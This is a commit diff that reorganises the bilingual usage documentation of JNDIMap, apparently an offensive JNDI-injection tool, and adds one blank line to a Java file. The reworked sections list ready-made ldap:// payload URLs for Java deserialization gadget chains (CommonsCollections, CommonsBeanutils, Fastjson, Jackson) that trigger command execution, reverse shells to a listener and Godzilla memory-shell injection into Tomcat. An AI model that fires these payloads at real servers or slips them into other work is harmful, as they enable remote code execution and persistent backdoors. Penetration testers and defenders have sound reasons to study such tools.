docs: 优化 USAGE LDAP 反序列化文档

X1r0z · X1r0z · commit 3b728599f2d1 · 2025-11-17T16:56:43.000+08:00
优化 USAGE 中反序列化部分的文档
diff --git a/README.en.md b/README.en.md
@@ -78,6 +78,11 @@ ldap://10.0.0.1:1389/Basic/ReverseShell/10.0.0.1/1337
     - [Derby Master-Slave Replication Deserialization RCE](USAGE.en.md#derby-master-slave-replication-deserialization-rce)
 - [Tomcat Blind XXE](USAGE.en.md#tomcat-blind-xxe)
 - [LDAP Deserialization](USAGE.en.md#ldap-deserialization)
+  - [Custom Data Deserialization](USAGE.en.md#custom-data-deserialization)
+  - [CommonsCollections](USAGE.en.md#commonscollections)
+  - [CommonsBeanutils](USAGE.en.md#commonsbeanutils)
+  - [Fastjson](USAGE.en.md#fastjson)
+  - [Jackson](USAGE.en.md#jackson)
 - [Script](USAGE.en.md#script)
 - [Advanced Techniques](USAGE.en.md#advanced-techniques)
   - [Use Reference Only](USAGE.en.md#use-reference-only)
diff --git a/README.md b/README.md
@@ -78,6 +78,11 @@ ldap://10.0.0.1:1389/Basic/ReverseShell/10.0.0.1/1337
     - [Derby 主从复制反序列化 RCE](USAGE.md#derby-主从复制反序列化-rce)
 - [Tomcat Blind XXE](USAGE.md#tomcat-blind-xxe)
 - [LDAP Deserialization](USAGE.md#ldap-deserialization)
+  - [自定义数据反序列化](USAGE.md#自定义数据反序列化)
+  - [CommonsCollections](USAGE.md#commonscollections)
+  - [CommonsBeanutils](USAGE.md#commonsbeanutils)
+  - [Fastjson](USAGE.md#fastjson)
+  - [Jackson](USAGE.md#jackson)
 - [Script](USAGE.md#script)
 - [高级技巧](USAGE.md#高级技巧)
   - [Use Reference Only](USAGE.md#use-reference-only)
diff --git a/USAGE.en.md b/USAGE.en.md
@@ -503,39 +503,47 @@ Supports Java deserialization via LDAP and LDAP protocols (RMI protocol is not s
 JNDIMap has built-in the following gadgets, and also supports custom data deserialization
 
 - CommonsCollections K1-K4
-- CommonsBeanutils183
-- CommonsBeanutils194
-- Fastjson1 (1.2.x)
-- Fastjson2 (2.0.x)
+- CommonsBeanutils 183, 194
+- Fastjson1 (1.2.x), Fastjson2 (2.0.x)
 - Jackson
 
-```bash
-# custom data deserialization
+### Custom Data Deserialization
 
+```bash
 # load via URL parameters
 ldap://127.0.0.1:1389/Deserialize/FromUrl/<base64-url-encoded-serialized-data>
 # load from the server running JNDIMap
 ldap://127.0.0.1:1389/Deserialize/FromFile/payload.ser # the path is relative to the current directory
 ldap://127.0.0.1:1389/Deserialize/FromFile/<base64-url-encoded-path-to-serialized-data>
+```
+
+### CommonsCollections
+
+Based on versions 3.1 and 4.0, and whether they depend on TemplatesImpl, they are divided into four versions: K1-K4
 
-# CommonsCollectionsK1 deserialization (3.1 + TemplatesImpl), supports command execution, reverse shell and memshell injection
+```bash
+# CommonsCollectionsK1 (3.1 + TemplatesImpl), supports command execution, reverse shell and memshell injection
 ldap://127.0.0.1:1389/Deserialize/CommonsCollectionsK1/Command/open -a Calculator
 ldap://127.0.0.1:1389/Deserialize/CommonsCollectionsK1/ReverseShell/127.0.0.1/4444
 ldap://127.0.0.1:1389/Deserialize/CommonsCollectionsK1/MemShell/Tomcat/Godzilla/Filter
 
-# CommonsCollectionsK2 deserialization (4.0 + TemplatesImpl), same as above
+# CommonsCollectionsK2 (4.0 + TemplatesImpl), same as above
 ldap://127.0.0.1:1389/Deserialize/CommonsCollectionsK2/Command/open -a Calculator
 
-# CommonsCollectionsK3 deserialization (3.1 + Runtime.exec), only supports command execution
+# CommonsCollectionsK3 (3.1 + Runtime.exec), only supports command execution
 ldap://127.0.0.1:1389/Deserialize/CommonsCollectionsK3/Command/open -a Calculator
 
-# CommonsCollectionsK4 deserialization (4.0 + Runtime.exec), same as above
+# CommonsCollectionsK4 (4.0 + Runtime.exec), same as above
 ldap://127.0.0.1:1389/Deserialize/CommonsCollectionsK4/Command/open -a Calculator
+```
+
+### CommonsBeanutils
 
-# CommonsBeanutils deserialization
-# No need for commons-collections dependency, use TemplatesImpl, support command execution, reverse shell and memshell injection
-# According to the different serialVersionUID of BeanComparator, it is divided into two versions: 1.8.3 and 1.9.4
+No need for commons-collections dependency, use TemplatesImpl
 
+According to the different serialVersionUID of BeanComparator, it is divided into two versions: 1.8.3 and 1.9.4
+
+```bash
 # 1.8.3
 ldap://127.0.0.1:1389/Deserialize/CommonsBeanutils183/Command/open -a Calculator
 ldap://127.0.0.1:1389/Deserialize/CommonsBeanutils183/ReverseShell/127.0.0.1/4444
@@ -545,10 +553,29 @@ ldap://127.0.0.1:1389/Deserialize/CommonsBeanutils183/MemShell/Tomcat/Godzilla/F
 ldap://127.0.0.1:1389/Deserialize/CommonsBeanutils194/Command/open -a Calculator
 ldap://127.0.0.1:1389/Deserialize/CommonsBeanutils194/ReverseShell/127.0.0.1/4444
 ldap://127.0.0.1:1389/Deserialize/CommonsBeanutils194/MemShell/Tomcat/Godzilla/Filter
+```
+
+### Fastjson
+
+It comes in two versions: 1.2.x and 2.0.x
+
+```bash
+# Fastjson1: all versions (1.2.x)
+ldap://127.0.0.1:1389/Deserialize/Fastjson1/Command/open -a Calculator
+ldap://127.0.0.1:1389/Deserialize/Fastjson1/ReverseShell/127.0.0.1/4444
+ldap://127.0.0.1:1389/Deserialize/Fastjson1/MemShell/Tomcat/Godzilla/Filter
 
-# Jackson deserialization
-# Use JdkDynamicAopProxy to optimize instability issues, need spring-aop dependency
+# Fastjson2: <= 2.0.26
+ldap://127.0.0.1:1389/Deserialize/Fastjson2/Command/open -a Calculator
+ldap://127.0.0.1:1389/Deserialize/Fastjson2/ReverseShell/127.0.0.1/4444
+ldap://127.0.0.1:1389/Deserialize/Fastjson2/MemShell/Tomcat/Godzilla/Filter
+```
 
+### Jackson
+
+Use JdkDynamicAopProxy to optimize instability issues, need spring-aop dependency
+
+```bash
 # for JDK 8
 ldap://127.0.0.1:1389/Deserialize/Jackson/Command/open -a Calculator
 ldap://127.0.0.1:1389/Deserialize/Jackson/ReverseShell/127.0.0.1/4444
@@ -566,18 +593,6 @@ ldap://127.0.0.1:1389/Deserialize/Jackson17A/MemShell/Tomcat/Godzilla/Filter
 ldap://127.0.0.1:1389/Deserialize/Jackson17B/Command/open -a Calculator
 ldap://127.0.0.1:1389/Deserialize/Jackson17B/ReverseShell/127.0.0.1/4444
 ldap://127.0.0.1:1389/Deserialize/Jackson17B/MemShell/Tomcat/Godzilla/Filter
-
-# Fastjson deserialization
-
-# Fastjson1: all versions (1.2.x)
-ldap://127.0.0.1:1389/Deserialize/Fastjson1/Command/open -a Calculator
-ldap://127.0.0.1:1389/Deserialize/Fastjson1/ReverseShell/127.0.0.1/4444
-ldap://127.0.0.1:1389/Deserialize/Fastjson1/MemShell/Tomcat/Godzilla/Filter
-
-# Fastjson2: <= 2.0.26
-ldap://127.0.0.1:1389/Deserialize/Fastjson2/Command/open -a Calculator
-ldap://127.0.0.1:1389/Deserialize/Fastjson2/ReverseShell/127.0.0.1/4444
-ldap://127.0.0.1:1389/Deserialize/Fastjson2/MemShell/Tomcat/Godzilla/Filter
 ```
 
 ## Script
diff --git a/USAGE.md b/USAGE.md
@@ -496,46 +496,55 @@ ldap://127.0.0.1:1389/TomcatXXE/<base64-url-encoded-path>
 [HTTP] Receive request: /V4J4ZH1P?content=helloworld
 ```
 
-### LDAP Deserialization
+## LDAP Deserialization
 
 通过 LDAP、LDAPS 协议触发 Java 反序列化, 不支持 RMI 协议
 
 JNDIMap 内置以下利用链, 同时也支持反序列化自定义数据
 
 - CommonsCollections K1-K4
-- CommonsBeanutils183
-- CommonsBeanutils194
-- Fastjson1 (1.2.x)
-- Fastjson2 (2.0.x)
+- CommonsBeanutils 183、194
+- Fastjson1 (1.2.x)、Fastjson2 (2.0.x)
 - Jackson
 
-```bash
-# 自定义数据反序列化
+### 自定义数据反序列化
 
+```bash
 # URL 传参加载
 ldap://127.0.0.1:1389/Deserialize/FromUrl/<base64-url-encoded-serialize-data>
+
 # 从运行 JNDIMap 的服务器上加载
 ldap://127.0.0.1:1389/Deserialize/FromFile/payload.ser # 相对于当前路径
 ldap://127.0.0.1:1389/Deserialize/FromFile/<base64-url-encoded-path-to-serialized-data>
+```
+
+### CommonsCollections
 
-# CommonsCollectionsK1 反序列化 (3.1 + TemplatesImpl), 支持命令执行, 反弹 Shell, 内存马注入
+按照 3.1、4.0 和是否依赖 TemplatesImpl, 分为 K1-K4 四个版本
+
+```bash
+# CommonsCollectionsK1 (3.1 + TemplatesImpl), 支持命令执行, 反弹 Shell, 内存马注入
 ldap://127.0.0.1:1389/Deserialize/CommonsCollectionsK1/Command/open -a Calculator
 ldap://127.0.0.1:1389/Deserialize/CommonsCollectionsK1/ReverseShell/127.0.0.1/4444
 ldap://127.0.0.1:1389/Deserialize/CommonsCollectionsK1/MemShell/Tomcat/Godzilla/Filter
 
-# CommonsCollectionsK2 反序列化 (4.0 + TemplatesImpl), 功能同上
+# CommonsCollectionsK2 (4.0 + TemplatesImpl), 功能同上
 ldap://127.0.0.1:1389/Deserialize/CommonsCollectionsK2/Command/open -a Calculator
 
-# CommonsCollectionsK3 反序列化 (3.1 + Runtime.exec), 仅支持命令执行
+# CommonsCollectionsK3 (3.1 + Runtime.exec), 仅支持命令执行
 ldap://127.0.0.1:1389/Deserialize/CommonsCollectionsK3/Command/open -a Calculator
 
-# CommonsCollectionsK4 反序列化 (4.0 + Runtime.exec), 功能同上
+# CommonsCollectionsK4 (4.0 + Runtime.exec), 功能同上
 ldap://127.0.0.1:1389/Deserialize/CommonsCollectionsK4/Command/open -a Calculator
+```
+
+### CommonsBeanutils
+
+无需 commons-collections 依赖, 使用 TemplatesImpl
 
-# CommonsBeanutils 反序列化
-# 无需 commons-collections 依赖, 使用 TemplatesImpl, 支持命令执行, 反弹 Shell, 内存马注入
-# 根据 BeanComparator serialVersionUID 不同, 分为两个版本: 1.8.3 和 1.9.4
+根据 BeanComparator serialVersionUID 的不同, 分为两个版本: 1.8.3 和 1.9.4
 
+```bash
 # 1.8.3
 ldap://127.0.0.1:1389/Deserialize/CommonsBeanutils183/Command/open -a Calculator
 ldap://127.0.0.1:1389/Deserialize/CommonsBeanutils183/ReverseShell/127.0.0.1/4444
@@ -545,10 +554,29 @@ ldap://127.0.0.1:1389/Deserialize/CommonsBeanutils183/MemShell/Tomcat/Godzilla/F
 ldap://127.0.0.1:1389/Deserialize/CommonsBeanutils194/Command/open -a Calculator
 ldap://127.0.0.1:1389/Deserialize/CommonsBeanutils194/ReverseShell/127.0.0.1/4444
 ldap://127.0.0.1:1389/Deserialize/CommonsBeanutils194/MemShell/Tomcat/Godzilla/Filter
+```
+
+### Fastjson
 
-# Jackson 反序列化
-# 使用 JdkDynamicAopProxy 优化不稳定性问题, 需要 spring-aop 依赖
+分为 1.2.x 和 2.0.x 两个版本
+
+```bash
+# Fastjson1: 全版本 (1.2.x)
+ldap://127.0.0.1:1389/Deserialize/Fastjson1/Command/open -a Calculator
+ldap://127.0.0.1:1389/Deserialize/Fastjson1/ReverseShell/127.0.0.1/4444
+ldap://127.0.0.1:1389/Deserialize/Fastjson1/MemShell/Tomcat/Godzilla/Filter
 
+# Fastjson2: <= 2.0.26
+ldap://127.0.0.1:1389/Deserialize/Fastjson2/Command/open -a Calculator
+ldap://127.0.0.1:1389/Deserialize/Fastjson2/ReverseShell/127.0.0.1/4444
+ldap://127.0.0.1:1389/Deserialize/Fastjson2/MemShell/Tomcat/Godzilla/Filter
+```
+
+### Jackson
+
+使用 JdkDynamicAopProxy 优化不稳定性问题, 需要 spring-aop 依赖
+
+```bash
 # 适用于 JDK 8
 ldap://127.0.0.1:1389/Deserialize/Jackson/Command/open -a Calculator
 ldap://127.0.0.1:1389/Deserialize/Jackson/ReverseShell/127.0.0.1/4444
@@ -566,18 +594,6 @@ ldap://127.0.0.1:1389/Deserialize/Jackson17A/MemShell/Tomcat/Godzilla/Filter
 ldap://127.0.0.1:1389/Deserialize/Jackson17B/Command/open -a Calculator
 ldap://127.0.0.1:1389/Deserialize/Jackson17B/ReverseShell/127.0.0.1/4444
 ldap://127.0.0.1:1389/Deserialize/Jackson17B/MemShell/Tomcat/Godzilla/Filter
-
-# Fastjson 反序列化
-
-# Fastjson1: 全版本 (1.2.x)
-ldap://127.0.0.1:1389/Deserialize/Fastjson1/Command/open -a Calculator
-ldap://127.0.0.1:1389/Deserialize/Fastjson1/ReverseShell/127.0.0.1/4444
-ldap://127.0.0.1:1389/Deserialize/Fastjson1/MemShell/Tomcat/Godzilla/Filter
-
-# Fastjson2: <= 2.0.26
-ldap://127.0.0.1:1389/Deserialize/Fastjson2/Command/open -a Calculator
-ldap://127.0.0.1:1389/Deserialize/Fastjson2/ReverseShell/127.0.0.1/4444
-ldap://127.0.0.1:1389/Deserialize/Fastjson2/MemShell/Tomcat/Godzilla/Filter
 ```
 
 ## Script
diff --git a/src/main/java/map/jndi/Dispatcher.java b/src/main/java/map/jndi/Dispatcher.java
@@ -91,6 +91,7 @@ public Object service(String path) {
                 }
             }
         }
+
         return null;
     }
 }

Original file line number	Diff line number	Diff line change
`@@ -91,6 +91,7 @@ public Object service(String path) {`
`91`	`91`	`}`
`92`	`92`	`}`
`93`	`93`	`}`
	`94`	`+`
`94`	`95`	`return null;`
`95`	`96`	`}`
`96`	`97`	`}`